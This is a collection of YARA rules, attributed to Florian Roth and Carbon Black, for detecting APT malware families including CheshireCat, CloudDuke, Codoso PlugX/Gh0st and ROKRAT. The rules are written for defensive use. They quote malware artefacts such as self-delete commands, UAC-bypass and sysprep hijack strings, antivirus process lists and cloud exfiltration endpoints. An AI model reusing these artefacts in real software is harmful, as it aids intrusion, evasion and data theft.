
rule CheshireCat_Gen1
{
    meta:
        description = "Auto-generated rule - file ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300"
        author = "Florian Roth"
        reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
        date = "2015-08-08"
        super_rule = 1
        score = 90
        hash1 = "ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300"
        hash2 = "32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a"
        hash3 = "63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb"
        hash4 = "c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532"
    strings:
        // $x*: module names and named-object GUIDs specific to the samples
        $x1 = "CAPESPN.DLL" fullword wide
        $x2 = "WINF.DLL" fullword wide
        $x3 = "NCFG.DLL" fullword wide
        $x4 = "msgrthlp.dll" fullword wide
        $x5 = "Local\\{c0d9770c-9841-430d-b6e3-575dac8a8ebf}" fullword ascii
        $x6 = "Local\\{1ef9f94a-5664-48a6-b6e8-c3748db459b4}" fullword ascii
        // $a*: registry path format strings
        $a1 = "Interface\\%s\\info" fullword ascii
        $a2 = "Interface\\%s\\info\\%s" fullword ascii
        $a3 = "CLSID\\%s\\info\\%s" fullword ascii
        $a4 = "CLSID\\%s\\info" fullword ascii
        // $b*: shell-extension display names
        $b1 = "Windows Shell Icon Handler" fullword wide
        $b2 = "Microsoft Shell Icon Handler" fullword wide
        // $s*: supporting strings (all seven are required by the condition)
        $s1 = "\\StringFileInfo\\%s\\FileVersion" fullword ascii
        $s2 = "CLSID\\%s\\AuxCLSID" fullword ascii
        $s3 = "lnkfile\\shellex\\IconHandler" fullword ascii
        $s4 = "%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu GMT" fullword ascii
        $s5 = "%sMutex" fullword ascii
        $s6 = "\\ShellIconCache" fullword ascii
        $s7 = "+6Service Pack " fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 350KB and 7 of ($s*) and 2 of ($a*) and 1 of ($b*) and 1 of ($x*)
}

rule CheshireCat_Gen2
{
    meta:
        description = "Auto-generated rule - from files 32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a, 63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb"
        author = "Florian Roth"
        reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
        date = "2015-08-08"
        super_rule = 1
        score = 70
        hash1 = "ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300"
        hash2 = "32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a"
        hash3 = "63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb"
        hash4 = "c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532"
    strings:
        // same $a*/$b*/$s* sets as CheshireCat_Gen1, without the sample-specific $x* set
        $a1 = "Interface\\%s\\info" fullword ascii
        $a2 = "Interface\\%s\\info\\%s" fullword ascii
        $a3 = "CLSID\\%s\\info\\%s" fullword ascii
        $a4 = "CLSID\\%s\\info" fullword ascii
        $b1 = "Windows Shell Icon Handler" fullword wide
        $b2 = "Microsoft Shell Icon Handler" fullword wide
        $s1 = "\\StringFileInfo\\%s\\FileVersion" fullword ascii
        $s2 = "CLSID\\%s\\AuxCLSID" fullword ascii
        $s3 = "lnkfile\\shellex\\IconHandler" fullword ascii
        $s4 = "%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu GMT" fullword ascii
        $s5 = "%sMutex" fullword ascii
        $s6 = "\\ShellIconCache" fullword ascii
        $s7 = "+6Service Pack " fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 200KB and 7 of ($s*) and 2 of ($a*) and 1 of ($b*)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

rule CloudDuke_Malware
{
    meta:
        description = "Detects CloudDuke Malware"
        author = "Florian Roth"
        reference = "https://www.f-secure.com/weblog/archives/00002822.html"
        date = "2015-07-22"
        score = 60
        // NOTE: the hash list below contains repeats (e.g. hash1/hash4/hash8 are the
        // same value); kept as found since meta entries do not affect matching
        hash1 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7"
        hash2 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f"
        hash3 = "1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7"
        hash4 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7"
        hash5 = "1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7"
        hash6 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f"
        hash7 = "ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46"
        hash8 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7"
        hash9 = "ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46"
        hash10 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145"
        hash11 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004"
        hash12 = "56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e"
        hash13 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145"
        hash14 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004"
        hash15 = "56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e"
    strings:
        $s1 = "ProcDataWrap" fullword ascii
        $s2 = "imagehlp.dll" fullword ascii
        $s3 = "dnlibsh" fullword ascii
        $s4 = "%ws_out%ws" fullword wide
        $s5 = "Akernel32.dll" fullword wide
        $op0 = { 0f b6 80 68 0e 41 00 0b c8 c1 e1 08 0f b6 c2 8b } /* Opcode */
        $op1 = { 8b ce e8 f8 01 00 00 85 c0 74 41 83 7d f8 00 0f } /* Opcode */
        $op2 = { e8 2f a2 ff ff 83 20 00 83 c8 ff 5f 5e 5d c3 55 } /* Opcode */
    condition:
        // MZ header, size bound, four of five strings plus one opcode sequence
        uint16(0) == 0x5a4d and filesize < 720KB and 4 of ($s*) and 1 of ($op*)
}

rule SFXRAR_Acrotray
{
    meta:
        description = "Most likely a malicious file acrotray in SFX RAR / CloudDuke APT 5442.1.exe, 5442.2.exe"
        author = "Florian Roth"
        reference = "https://www.f-secure.com/weblog/archives/00002822.html"
        date = "2015-07-22"
        super_rule = 1
        score = 70
        hash1 = "51e713c7247f978f5836133dd0b8f9fb229e6594763adda59951556e1df5ee57"
        hash2 = "5d695ff02202808805da942e484caa7c1dc68e6d9c3d77dc383cfa0617e61e48"
        hash3 = "56531cc133e7a760b238aadc5b7a622cd11c835a3e6b78079d825d417fb02198"
    strings:
        // WinRAR SFX artefacts combined with the acrotray.exe name
        $s1 = "winrarsfxmappingfile.tmp" fullword wide /* PEStudio Blacklist: strings */
        $s2 = "GETPASSWORD1" fullword wide /* PEStudio Blacklist: strings */
        $s3 = "acrotray.exe" fullword ascii
        $s4 = "CryptUnprotectMemory failed" fullword wide /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 2449KB and all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

rule Cobalt_functions
{
    meta:
        author="@j0sm1"
        url="https://www.securityartwork.es/2017/06/16/analisis-del-powershell-usado-fin7/"
        description="Detect functions coded with ROR edi,D; Detect CobaltStrike used by differents groups APT"
    strings:
        // 4-byte API-name hashes as they appear in the shellcode; the comment on each
        // line names the API the author attributes the hash to
        $h1={58 A4 53 E5} // VirtualAllocEx
        $h2={4C 77 26 07} // LoadLibraryEx
        $h3={6A C9 9C C9} // DNSQuery_UTF8
        $h4={44 F0 35 E0} // Sleep
        $h5={F4 00 8E CC} // lstrlen
    condition:
        // short 4-byte patterns with no header check: two hits are required
        // to keep the false-positive rate down
        2 of ( $h* )
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

/*
   Yara Rule Set
   Author: Florian Roth
   Date: 2016-01-30
   Identifier: Codoso
   Comment: Reduced signature set for LOKI integration
*/

/* Rule Set ----------------------------------------------------------------- */

rule Codoso_PlugX_3
{
    meta:
        description = "Detects Codoso APT PlugX Malware"
        author = "Florian Roth"
        reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
        date = "2016-01-30"
        hash = "74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3"
    strings:
        // WinRAR SFX stub strings together with the dropped file names
        $s1 = "Cannot create folder %sDCRC failed in the encrypted file %s. Corrupt file or wrong password." fullword wide
        $s2 = "mcs.exe" fullword ascii
        $s3 = "McAltLib.dll" fullword ascii
        $s4 = "WinRAR self-extracting archive" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 1200KB and all of them
}

rule Codoso_PlugX_2
{
    meta:
        description = "Detects Codoso APT PlugX Malware"
        author = "Florian Roth"
        reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
        date = "2016-01-30"
        hash = "b9510e4484fa7e3034228337768176fce822162ad819539c6ca3631deac043eb"
    strings:
        $s1 = "%TEMP%\\HID" fullword wide
        $s2 = "%s\\hid.dll" fullword wide
        $s3 = "%s\\SOUNDMAN.exe" fullword wide
        $s4 = "\"%s\\SOUNDMAN.exe\" %d %d" fullword wide
        $s5 = "%s\\HID.dllx" fullword wide
    condition:
        // the "or all of them" branch deliberately matches without the MZ/size guard
        ( uint16(0) == 0x5a4d and filesize < 400KB and 3 of them ) or all of them
}

rule Codoso_CustomTCP_4
{
    meta:
        description = "Detects Codoso APT CustomTCP Malware"
        author = "Florian Roth"
        reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
        date = "2016-01-30"
        hash1 = "ea67d76e9d2e9ce3a8e5f80ff9be8f17b2cd5b1212153fdf36833497d9c060c0"
        hash2 = "130abb54112dd47284fdb169ff276f61f2b69d80ac0a9eac52200506f147b5f8"
        hash3 = "3ea6b2b51050fe7c07e2cf9fa232de6a602aa5eff66a2e997b25785f7cf50daa"
        hash4 = "02cf5c244aebaca6195f45029c1e37b22495609be7bdfcfcd79b0c91eac44a13"
    strings:
        $x1 = "varus_service_x86.dll" fullword ascii
        // service-control command templates ("%%1" is a literal "%1" batch argument)
        $s1 = "/s %s /p %d /st %d /rt %d" fullword ascii
        $s2 = "net start %%1" fullword ascii
        $s3 = "ping 127.1 > nul" fullword ascii
        $s4 = "McInitMISPAlertEx" fullword ascii
        $s5 = "sc start %%1" fullword ascii
        $s6 = "net stop %%1" fullword ascii
        $s7 = "WorkerRun" fullword ascii
    condition:
        ( uint16(0) == 0x5a4d and filesize < 400KB and 5 of them ) or ( $x1 and 2 of ($s*) )
}

rule Codoso_CustomTCP_3
{
    meta:
        description = "Detects Codoso APT CustomTCP Malware"
        author = "Florian Roth"
        reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
        date = "2016-01-30"
        hash = "d66106ec2e743dae1d71b60a602ca713b93077f56a47045f4fc9143aa3957090"
    strings:
        $s1 = "DnsApi.dll" fullword ascii
        // odd casing ("softWARE", "hTTP", "HTTp") is part of the signature; these
        // strings are case-sensitive on purpose
        $s2 = "softWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\%s" ascii
        $s3 = "CONNECT %s:%d hTTP/1.1" ascii
        $s4 = "CONNECT %s:%d HTTp/1.1" ascii
        $s5 = "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0;)" ascii
        $s6 = "iphlpapi.dll" ascii
        $s7 = "%systemroot%\\Web\\" ascii
        $s8 = "Proxy-Authorization: Negotiate %s" ascii
        $s9 = "CLSID\\{%s}\\InprocServer32" ascii
    condition:
        ( uint16(0) == 0x5a4d and filesize < 500KB and 5 of them ) or 7 of them
}

rule Codoso_CustomTCP_2
{
    meta:
        description = "Detects Codoso APT CustomTCP Malware"
        author = "Florian Roth"
        reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
        date = "2016-01-30"
        hash = "3577845d71ae995762d4a8f43b21ada49d809f95c127b770aff00ae0b64264a3"
    strings:
        $s1 = "varus_service_x86.dll" fullword ascii
        $s2 = "/s %s /p %d /st %d /rt %d" fullword ascii
        $s3 = "net start %%1" fullword ascii
        $s4 = "ping 127.1 > nul" fullword ascii
        $s5 = "McInitMISPAlertEx" fullword ascii
        $s6 = "sc start %%1" fullword ascii
        $s7 = "B_WKNDNSK^" fullword ascii
        $s8 = "net stop %%1" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 406KB and all of them
}

rule Codoso_PGV_PVID_6
{
    meta:
        description = "Detects Codoso APT PGV_PVID Malware"
        author = "Florian Roth"
        reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
        date = "2016-01-30"
        hash = "4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f"
    strings:
        // rundll32 launch template plus the delayed self-delete command line
        $s0 = "rundll32 \"%s\",%s" fullword ascii
        $s1 = "/c ping 127.%d & del \"%s\"" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 6000KB and all of them
}

rule Codoso_Gh0st_3
{
    meta:
        description = "Detects Codoso APT Gh0st Malware"
        author = "Florian Roth"
        reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
        date = "2016-01-30"
        hash = "bf52ca4d4077ae7e840cf6cd11fdec0bb5be890ddd5687af5cfa581c8c015fcd"
    strings:
        $x1 = "RunMeByDLL32" fullword ascii
        $s1 = "svchost.dll" fullword wide
        $s2 = "server.dll" fullword ascii
        $s3 = "Copyright ? 2008" fullword wide
        $s4 = "testsupdate33" fullword ascii
        $s5 = "Device Protect Application" fullword wide
        $s6 = "MSVCP60.DLL" fullword ascii /* Goodware String - occured 1 times */
        $s7 = "mail-news.eicp.net" fullword ascii
    condition:
        // NOTE(review): "and" binds tighter than "or", so this is
        //   ( uint16(0) == 0x5a4d and filesize < 195KB and $x1 ) or 4 of them
        // and "4 of them" fires without the MZ/size guard. Compare Codoso_Gh0st_1,
        // where the author parenthesised the guarded part; left unchanged here
        // because the intent is not recoverable from the rule alone.
        uint16(0) == 0x5a4d and filesize < 195KB and $x1 or 4 of them
}

rule Codoso_Gh0st_2
{
    meta:
        description = "Detects Codoso APT Gh0st Malware"
        author = "Florian Roth"
        reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
        date = "2016-01-30"
        hash = "5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841"
    strings:
        $s0 = "cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s" fullword ascii
        $s1 = "rundll32.exe \"%s\", RunMeByDLL32" fullword ascii
        $s13 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide
        $s14 = "%s -r debug 1" fullword ascii
        $s15 = "\\\\.\\keymmdrv1" fullword ascii
        $s17 = "RunMeByDLL32" fullword ascii
    condition:
        // a single hit is enough; each string is specific to this family
        uint16(0) == 0x5a4d and filesize < 500KB and 1 of them
}

rule Codoso_CustomTCP
{
    meta:
        description = "Codoso CustomTCP Malware"
        author = "Florian Roth"
        reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
        date = "2016-01-30"
        hash = "b95d7f56a686a05398198d317c805924c36f3abacbb1b9e3f590ec0d59f845d8"
    strings:
        $s4 = "wnyglw" fullword ascii
        $s5 = "WorkerRun" fullword ascii
        $s7 = "boazdcd" fullword ascii
        $s8 = "wayflw" fullword ascii
        $s9 = "CODETABL" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 405KB and all of them
}

/* Super Rules ------------------------------------------------------------- */

rule Codoso_PGV_PVID_5
{
    meta:
        description = "Detects Codoso APT PGV PVID Malware"
        author = "Florian Roth"
        reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
        date = "2016-01-30"
        super_rule = 1
        hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
        hash2 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
    strings:
        $s1 = "/c del %s >> NUL" fullword ascii
        $s2 = "%s%s.manifest" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 500KB and all of them
}

rule Codoso_Gh0st_1
{
    meta:
        description = "Detects Codoso APT Gh0st Malware"
        author = "Florian Roth"
        reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
        date = "2016-01-30"
        super_rule = 1
        hash1 = "5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841"
        hash2 = "7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8"
        hash3 = "d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297"
    strings:
        // $x*: high-confidence family strings (any one matches on its own)
        $x1 = "cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s" fullword ascii
        $x2 = "rundll32.exe \"%s\", RunMeByDLL32" fullword ascii
        $x3 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide
        $x4 = "\\\\.\\keymmdrv1" fullword ascii
        // $s*: security-product process names referenced by the sample
        $s1 = "spideragent.exe" fullword ascii
        $s2 = "AVGIDSAgent.exe" fullword ascii
        $s3 = "kavsvc.exe" fullword ascii
        $s4 = "mspaint.exe" fullword ascii
        $s5 = "kav.exe" fullword ascii
        $s6 = "avp.exe" fullword ascii
        $s7 = "NAV.exe" fullword ascii
        // $c*: UAC-bypass / sysprep related artefacts and named events
        $c1 = "Elevation:Administrator!new:" wide
        $c2 = "Global\\RUNDLL32EXITEVENT_NAME{12845-8654-543}" fullword ascii
        $c3 = "\\sysprep\\sysprep.exe" fullword wide
        $c4 = "\\sysprep\\CRYPTBASE.dll" fullword wide
        $c5 = "Global\\TERMINATEEVENT_NAME{12845-8654-542}" fullword ascii
        $c6 = "ConsentPromptBehaviorAdmin" fullword ascii
        $c7 = "\\sysprep" fullword wide
        $c8 = "Global\\UN{5FFC0C8B-8BE5-49d5-B9F2-BCDC8976EE10}" fullword ascii
    condition:
        // "1 of ($x*)" and "6 of ($c*)" are unguarded alternatives by precedence
        uint16(0) == 0x5a4d and filesize < 1000KB and ( 4 of ($s*) or 4 of ($c*) ) or 1 of ($x*) or 6 of ($c*)
}

rule Codoso_PGV_PVID_4
{
    meta:
        // NOTE(review): description says PlugX while the rule name says PGV_PVID;
        // the hashes overlap with the other PGV_PVID rules
        description = "Detects Codoso APT PlugX Malware"
        author = "Florian Roth"
        reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
        date = "2016-01-30"
        super_rule = 1
        hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
        hash2 = "8a56b476d792983aea0199ee3226f0d04792b70a1c1f05f399cb6e4ce8a38761"
        hash3 = "b2950f2e09f5356e985c38b284ea52175d21feee12e582d674c0da2233b1feb1"
        hash4 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
        hash5 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
    strings:
        $x1 = "dropper, Version 1.0" fullword wide
        $x2 = "dropper" fullword wide
        $x3 = "DROPPER" fullword wide
        $x4 = "About dropper" fullword wide
        $s1 = "Microsoft Windows Manager Utility" fullword wide
        $s2 = "SYSTEM\\CurrentControlSet\\Services\\" fullword ascii /* Goodware String - occured 9 times */
        $s3 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify" fullword ascii /* Goodware String - occured 10 times */
        $s4 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3" ascii /* Goodware String - occured 46 times */
        $s5 = "<supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"></supportedOS>" fullword ascii /* Goodware String - occured 65 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 900KB and 1 of ($x*) and 2 of ($s*)
}

rule Codoso_PlugX_1
{
    meta:
        description = "Detects Codoso APT PlugX Malware"
        author = "Florian Roth"
        reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
        date = "2016-01-30"
        super_rule = 1
        hash1 = "0b8cbc9b4761ab35acce2aa12ba2c0a283afd596b565705514fd802c8b1e144b"
        hash2 = "448711bd3f689ceebb736d25253233ac244d48cb766834b8f974c2e9d4b462e8"
        hash3 = "fd22547497ce52049083092429eeff0599d0b11fe61186e91c91e1f76b518fe2"
    strings:
        $s1 = "GETPASSWORD1" fullword ascii
        $s2 = "NvSmartMax.dll" fullword ascii
        $s3 = "LICENSEDLG" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 800KB and all of them
}

rule Codoso_PGV_PVID_3
{
    meta:
        description = "Detects Codoso APT PGV PVID Malware"
        author = "Florian Roth"
        reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
        date = "2016-01-30"
        super_rule = 1
        hash1 = "126fbdcfed1dfb31865d4b18db2fb963f49df838bf66922fea0c37e06666aee1"
        hash2 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
        hash3 = "8a56b476d792983aea0199ee3226f0d04792b70a1c1f05f399cb6e4ce8a38761"
        hash4 = "b2950f2e09f5356e985c38b284ea52175d21feee12e582d674c0da2233b1feb1"
        hash5 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
        hash6 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
    strings:
        // single version-info string; no MZ or size guard in this rule
        $x1 = "Copyright (C) Microsoft Corporation. All rights reserved.(C) 2012" fullword wide
    condition:
        $x1
}

rule Codoso_PGV_PVID_2
{
    meta:
        description = "Detects Codoso APT PGV PVID Malware"
        author = "Florian Roth"
        reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
        date = "2016-01-30"
        super_rule = 1
        hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
        hash2 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
        hash3 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
    strings:
        // svchost service-group persistence artefacts
        $s0 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost" fullword ascii
        $s1 = "regsvr32.exe /s \"%s\"" fullword ascii
        $s2 = "Help and Support" fullword ascii
        $s3 = "netsvcs" fullword ascii
        $s9 = "%SystemRoot%\\System32\\svchost.exe -k netsvcs" fullword ascii /* Goodware String - occured 4 times */
        $s10 = "winlogon" fullword ascii /* Goodware String - occured 4 times */
        $s11 = "System\\CurrentControlSet\\Services" fullword ascii /* Goodware String - occured 11 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 907KB and all of them
}

rule Codoso_PGV_PVID_1
{
    meta:
        description = "Detects Codoso APT PGV PVID Malware"
        author = "Florian Roth"
        reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
        date = "2016-01-30"
        super_rule = 1
        hash1 = "41a936b0d1fd90dffb2f6d0bcaf4ad0536f93ca7591f7b75b0cd1af8804d0824"
        hash2 = "58334eb7fed37e3104d8235d918aa5b7856f33ea52a74cf90a5ef5542a404ac3"
        hash3 = "934b87ddceabb2063b5e5bc4f964628fe0c63b63bb2346b105ece19915384fc7"
        hash4 = "ce91ea20aa2e6af79508dd0a40ab0981f463b4d2714de55e66d228c579578266"
        hash5 = "e770a298ae819bba1c70d0c9a2e02e4680d3cdba22d558d21caaa74e3970adf1"
    strings:
        // the "pgv_pvid" cookie name gives this family its label
        $x1 = "Cookie: pgv_pvid=" ascii
        $x2 = "DRIVERS\\ipinip.sys" fullword wide
        $s1 = "TsWorkSpaces.dll" fullword ascii
        $s2 = "%SystemRoot%\\System32\\wiaservc.dll" fullword wide
        $s3 = "/selfservice/microsites/search.php?%016I64d" fullword ascii
        $s4 = "/solutions/company-size/smb/index.htm?%016I64d" fullword ascii
        $s5 = "Microsoft Chart ActiveX Control" fullword wide
        $s6 = "MSChartCtrl.ocx" fullword wide
        $s7 = "{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}" fullword ascii
        $s8 = "WUServiceMain" fullword ascii /* Goodware String - occured 2 times */
    condition:
        ( uint16(0) == 0x5a4d and ( 1 of ($x*) or 3 of them ) ) or 5 of them
}

// ROKRAT loader / payload rules (Carbon Black TAU). The tag list after the rule
// name (TAU DPRK APT) is YARA rule tagging, not part of the condition.
rule ROKRAT_loader : TAU DPRK APT
{
    meta:
        author = "CarbonBlack Threat Research" //JMyers
        date = "2018-Jan-11"
        description = "Designed to catch loader observed used with ROKRAT malware"
        reference = "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/"
        rule_version = 1
        yara_version = "3.7.0"
        TLP = "White"
        exemplar_hashes = "e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd"
    strings:
        // $n*: host processes named in the loader
        $n1 = "wscript.exe"
        $n2 = "cmd.exe"
        // $s*: API names used for injection and resource loading
        $s1 = "CreateProcess"
        $s2 = "VirtualAlloc"
        $s3 = "WriteProcessMemory"
        $s4 = "CreateRemoteThread"
        $s5 = "LoadResource"
        $s6 = "FindResource"
        // $b*: code fragments of the decode stub
        $b1 = {33 C9 33 C0 E8 00 00 00 00 5E} //Clear Register, call+5, pop ESI
        $b2 = /\xB9.{3}\x00\x81\xE9?.{3}\x00/ //subtraction for encoded data offset
        //the above regex could slow down scanning
        $b3 = {03 F1 83 C6 02} //Fix up position
        $b4 = {3E 8A 06 34 90 46} //XOR decode Key
        $b5 = {3E 30 06 46 49 83 F9 00 75 F6} //XOR routine and jmp to code
        //push api hash values plain text
        $hpt_1 = {68 EC 97 03 0C} //api name hash value – Global Alloc
        $hpt_2 = {68 54 CA AF 91} //api name hash value – Virtual Alloc
        $hpt_3 = {68 8E 4E 0E EC} //api name hash value – Load Library
        $hpt_4 = {68 AA FC 0D 7C} //api name hash value – GetProc Addr
        $hpt_5 = {68 1B C6 46 79} //api name hash value – Virtual Protect
        $hpt_6 = {68 F6 22 B9 7C} //api name hash value – Global Free
        //push api hash values encoded XOR 0x13
        $henc_1 = {7B FF 84 10 1F} //api name hash value – Global Alloc
        $henc_2 = {7B 47 D9 BC 82} //api name hash value – Virtual Alloc
        $henc_3 = {7B 9D 5D 1D EC} //api name hash value – Load Library
        $henc_4 = {7B B9 EF 1E 6F} //api name hash value – GetProc Addr
        $henc_5 = {7B 08 D5 55 6A}
        //api name hash value – Virtual Protect
        $henc_6 = {7B E5 31 AA 6F} //api name hash value – Global Free
    condition:
        // either the generic loader profile, or the complete set of pushed API hashes
        // in one of the two encodings
        (1 of ($n*) and 4 of ($s*) and 4 of ($b*)) or all of ($hpt*) or all of ($henc*)
}

rule ROKRAT_payload : TAU DPRK APT
{
    meta:
        author = "CarbonBlack Threat Research" //JMyers
        date = "2018-Jan-11"
        // NOTE(review): description text is identical to ROKRAT_loader's; the strings
        // below are payload (cloud-API / anti-analysis) artefacts, not loader ones
        description = "Designed to catch loader observed used with ROKRAT malware"
        reference = "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/"
        rule_version = 1
        yara_version = "3.7.0"
        TLP = "White"
        exemplar_hashes = "e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573"
    strings:
        // cloud storage API endpoints used for exfiltration / tasking
        $s1 = "api.box.com/oauth2/token" wide
        $s2 = "upload.box.com/api/2.0/files/content" wide
        $s3 = "api.pcloud.com/uploadfile?path=%s&filename=%s&nopartial=1" wide
        $s4 = "cloud-api.yandex.net/v1/disk/resources/download?path=%s" wide
        // sandbox / analysis-tool DLL names
        $s5 = "SbieDll.dll"
        $s6 = "dbghelp.dll"
        $s7 = "api_log.dll"
        $s8 = "dir_watch.dll"
        $s9 = "def_%s.jpg" wide
        $s10 = "pho_%s_%d.jpg" wide
        $s11 = "login=%s&password=%s&login_submit=Authorizing" wide
        $s12 = "gdiplus.dll"
        // $s13/$s14 are literal text strings that happen to look like regexes
        $s13 = "Set-Cookie:\\b*{.+?}\\n" wide
        $s14 = "charset={[A-Za-z0-9\\-_]+}" wide
    condition:
        12 of ($s*)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

/* APTAnthemDeepPanda */

rule Anthem_DeepPanda_sl_txt_packed
{
    meta:
        description = "Anthem Hack Deep Panda - ScanLine sl-txt-packed"
        author = "Florian Roth"
        date = "2015/02/08"
